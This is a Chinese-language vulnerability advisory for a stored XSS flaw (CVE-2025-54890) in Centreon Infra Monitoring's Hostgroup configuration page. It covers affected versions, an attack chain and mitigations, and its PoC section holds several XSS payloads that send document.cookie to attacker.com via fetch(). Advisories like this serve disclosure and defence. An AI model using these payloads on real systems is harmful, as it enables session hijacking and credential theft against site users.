CVE-2025-54890 Centreon Infra Monitoring 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-54890

漏洞类型

存储型XSS

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Centreon Infra Monitoring

漏洞概述

CVE-2025-54890是Centreon Infra Monitoring中发现的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Hostgroup配置页面，由于对用户输入未进行充分的消毒处理，导致具有提升权限的用户可以在页面中注入恶意JavaScript代码。成功利用此漏洞，攻击者可以在其他用户访问受感染页面时窃取会话令牌、劫持用户账户或进行其他恶意操作。由于该脚本会被永久存储在服务器端，任何访问受影响页面的用户都会受到攻击影响。此漏洞需要攻击者具有较高的权限（Hostgroup配置权限），但利用后可以造成严重的安全后果，包括机密性破坏和数据泄露。Centreon是一个广泛使用的开源基础设施监控平台，因此该漏洞对使用该平台的企业和组织构成中等程度的安全风险。

技术细节

该漏洞是典型的存储型XSS（Stored XSS）问题，发生在Centreon的Infra Monitoring模块的Hostgroup配置页面。漏洞的根本原因是在Web页面生成过程中对用户输入的特殊字符（如<、>、"、'等）没有进行正确的HTML转义或过滤。当具有管理员或高权限的用户在创建或修改Hostgroup配置时，如果输入包含恶意JavaScript代码（如<script>alert(document.cookie)</script>），这些代码会被直接存储到数据库中。随后，当其他用户访问该Hostgroup配置页面或相关列表页面时，存储的恶意脚本会被浏览器作为正常HTML/JavaScript执行，从而实现跨站脚本攻击。由于攻击代码存储在服务器端，此漏洞的影响范围更广，攻击持续时间更长。攻击者可以利用此漏洞窃取受害者用户的认证cookie、凭据或执行任意操作。CVSS评分6.8反映了该漏洞需要高权限用户参与且不影响完整性和可用性的特点。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标Centreon实例版本，确认其运行在受影响版本范围内（24.10.0-24.10.14、24.04.0-24.04.18或23.10.0-23.10.28）

STEP 2

Initial Access

攻击者获取Centreon的高权限账户（如管理员或具有Hostgroup配置权限的用户），可以通过凭据盗窃、社会工程或利用其他漏洞获得

STEP 3

Payload Injection

攻击者登录Centreon，导航至Infra Monitoring的Hostgroup配置页面，在Hostgroup名称、别名或描述字段中注入恶意JavaScript代码

STEP 4

Persistence

恶意脚本随Hostgroup配置保存到数据库，成为持久性威胁，每次页面加载都会执行

STEP 5

Trigger & Exploitation

当其他用户（如普通监控人员）访问Hostgroups列表或相关详情页面时，存储的XSS payload在受害者浏览器中执行

STEP 6

Impact

成功利用后，攻击者可窃取受害者会话cookie、凭据，执行任意操作如添加后门账户、修改监控配置或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-54890 PoC - Stored XSS in Centreon Hostgroup Configuration
// Author: Security Researcher
// Target: Centreon Infra Monitoring <= 24.10.14, <= 24.04.18, <= 23.10.28

// Step 1: Authenticate to Centreon with high privilege account (e.g., Admin)
// Step 2: Navigate to Infrastructure > Hosts > Hostgroups
// Step 3: Create new Hostgroup or edit existing one
// Step 4: In the Hostgroup name or description field, inject XSS payload:

const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>';

// Alternative XSS payloads:
// <img src=x onerror="fetch('https://attacker.com/steal?data='+btoa(document.cookie))">
// <svg/onload=fetch('https://attacker.com/exfil?cookie='+document.cookie)>
// <body onload="fetch('https://attacker.com/steal?c='+document.cookie)">

// Step 5: Save the Hostgroup configuration
// Step 6: Any user viewing the Hostgroups list or details will trigger the XSS

// Impact: Session hijacking, credential theft, privilege escalation

影响范围

Centreon Infra Monitoring 24.10.0 - 24.10.14

Centreon Infra Monitoring 24.04.0 - 24.04.18

Centreon Infra Monitoring 23.10.0 - 23.10.28

防御指南

临时缓解措施

在官方安全更新发布前，可采取以下临时缓解措施：1) 限制Hostgroup配置页面的访问权限，仅允许绝对必要的用户访问；2) 实施严格的输入过滤规则，对<、>、'、"、script等关键字进行过滤或转义；3) 部署Web应用防火墙规则识别和阻止XSS攻击特征；4) 启用HTTPOnly和Secure标志保护会话cookie；5) 加强对Centreon用户账户的安全监控，检测异常行为；6) 考虑临时禁用非必要的Hostgroup配置功能直到补丁应用。